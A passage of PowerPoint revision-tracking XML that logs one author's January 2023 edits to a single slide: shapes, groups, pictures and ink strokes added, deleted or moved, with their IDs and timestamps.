        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:39:00.217" v="7409" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3832892873" sldId="288"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:38:12.874" v="7402" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:spMk id="2" creationId="{1A02312F-F52A-64EC-B0EE-E7A5CD7EB257}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:42:48.631" v="3296" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:spMk id="2" creationId="{C417D638-4CA5-C332-F774-FF9DD30192CD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:51:36.875" v="4392" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:spMk id="6" creationId="{968E5978-7166-8B96-779B-E67C42DE5AB1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:38:59.694" v="4217" actId="11529"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:spMk id="59" creationId="{73C97345-8A11-5EA6-DAA8-D1D92995665A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:52:10.528" v="4404" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:spMk id="60" creationId="{AB81BACE-E642-24BD-4131-79FF18A90C28}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:52:27.407" v="4413" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:spMk id="61" creationId="{83AA0FBF-A3F7-E705-C189-443351931BCF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:49:54.277" v="4351" actId="688"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:spMk id="62" creationId="{D374D5C1-68FB-6AD0-C2F2-8F7B8E15C5DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:52:33.905" v="4414" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:spMk id="71" creationId="{E83BE57A-7B0D-9762-8887-0DEFD87B46EB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:21.143" v="4143"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="15" creationId="{8C354A8E-EB0F-E481-CBD6-BAACE256B266}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:21.143" v="4143"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="16" creationId="{4108FF25-B393-0B34-4024-6B6CFB9D33B0}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:20.601" v="4140"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="19" creationId="{9F015334-B571-84BA-4D93-8ABEDE9C221C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:28.721" v="4151"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="22" creationId="{4AE492D7-DAFB-E3A8-E507-6CD5F7FC014C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:11.454" v="4178"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="27" creationId="{E74A0A95-875A-693C-2184-D7F18B8ED586}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:10.751" v="4175"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="30" creationId="{42F1697C-19C1-EA9D-57C6-F790EB8B24C1}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:10.023" v="4170"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="35" creationId="{7270661B-495E-B3CF-4224-0F8CE4DC02AC}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:32.494" v="4196"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="38" creationId="{0BC4FEF8-540E-5549-306C-4C2DF2301A49}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:31.494" v="4193"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="41" creationId="{B912D62E-71DB-40D2-B320-2EE8E56B359E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:31.136" v="4190"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="44" creationId="{ADCC74EF-A997-FFC3-9A1A-560F01274005}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:46.647" v="4205"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="47" creationId="{25CA963C-D7AD-A7B7-F806-B32B55F91750}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:52.762" v="4208"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="51" creationId="{409A0768-FB4F-C818-8E5C-29D6896AA423}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:52.762" v="4208"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="54" creationId="{14927E0C-5F36-2EAE-0193-987D99162CB5}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:50:10.870" v="4356"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="65" creationId="{815D1436-63AB-D7A2-E660-E5C9D960EC1C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:50:24.528" v="4364"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:grpSpMk id="70" creationId="{29956FD9-67CC-8C2D-FD47-304070E09FF3}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:49:38.151" v="3348" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:picMk id="4" creationId="{8246BA5B-153F-6634-E9AC-8D08D8DC74A8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:38:22.266" v="4211" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:picMk id="56" creationId="{E8803D89-96AE-9D44-2069-2F0EE3A8F6A0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:39:00.217" v="7409" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:picMk id="1026" creationId="{EA86DDF5-F48D-DEB7-C68A-7931A140545C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:22.878" v="4146" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="11" creationId="{D428D2CA-A386-9077-6346-E4013556280F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:22.230" v="4145" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="12" creationId="{CBCE95A4-A40E-AC2F-BF2E-173D7B85686B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:21.399" v="4144" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="13" creationId="{A24E0E7D-EA65-5DDF-24EE-DB7AA3406F32}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:21.143" v="4143"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="14" creationId="{A94EB75F-1686-6516-BB29-54C9B89B2A86}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:20.839" v="4141" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="17" creationId="{78D64092-A3DA-87EC-5EC9-E801379C6480}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:20.601" v="4140"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="18" creationId="{CCF4B053-B6FA-D6A8-EC33-890347364DFA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:29.016" v="4152" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="20" creationId="{4D70F246-9658-2C9A-72C5-A1A7FD6ECB71}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:28.721" v="4151"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="21" creationId="{A6A0FC50-A3BD-22AA-9CA3-38E3235A5FEF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:48.183" v="4155" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="23" creationId="{505D543D-E9DC-7057-44F0-3B8785402003}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:35:52.125" v="4157" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="24" creationId="{14FD4A03-897F-76DC-AD5C-7AC40F24BFEE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:12.089" v="4179" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="25" creationId="{3B59ED04-F8B0-AB38-6C2A-B0F271B06757}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:11.454" v="4178"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="26" creationId="{A73CD3D9-DCD2-BA66-F3D5-71A8BB614077}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:11.031" v="4176" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="28" creationId="{A1903574-D1C6-31EF-0D89-19F1FE439BC8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:10.751" v="4175"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="29" creationId="{B2B820C3-455A-183C-D892-E9C3AFF073FA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:10.589" v="4173" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="31" creationId="{339F445A-3DC4-7F9F-27FC-04E94B287F60}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:10.421" v="4172" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="32" creationId="{AF792263-7444-042C-898B-410F802F856A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:10.263" v="4171" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="33" creationId="{C55C047D-06EE-03B0-8D05-B3DFA49128E6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:10.023" v="4170"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="34" creationId="{E27AAC50-1CBB-A203-C393-1153F267B89B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:32.935" v="4197" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="36" creationId="{EFE7FEAF-A030-D871-3A49-332DF14DFF7C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:32.494" v="4196"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="37" creationId="{01AC5BF2-58B2-BD34-DD85-F66BE458AAEC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:31.653" v="4194" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="39" creationId="{541DD709-EA96-F839-92FA-734E65EA5467}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:31.494" v="4193"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="40" creationId="{C97BEDC5-55FA-438A-DE7A-3CDA7B88889B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:31.333" v="4191" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="42" creationId="{0328E978-BE92-D35E-067B-9377C1F61DB8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:31.136" v="4190"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="43" creationId="{5EB49833-EB9C-B3B9-E836-2B26E7025AE5}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:52.762" v="4208"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="45" creationId="{A16DAD79-E8AF-CCD2-871C-4DE339A8BAF1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:52.762" v="4208"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="46" creationId="{12F02EFE-CE58-CC22-AA01-20B80D7C9BBB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:41.630" v="4202" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="48" creationId="{CB33B3E1-2F7C-7FEB-E713-A9D5638C7BA8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:52.762" v="4208"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="49" creationId="{44445D53-3302-A97A-A003-327440DD680D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:52.762" v="4208"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="50" creationId="{654D5C2B-1CC6-8FE5-C6D7-C98CDCCED643}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:52.762" v="4208"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3832892873" sldId="288"/>
            <ac:inkMk id="52" creationId="{0A41749B-C600-6DB7-5E8B-2BE2D4885BF1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T20:36:52.762" v="4208"/>
          <ac:inkMkLst>
            <pc:docMk/>
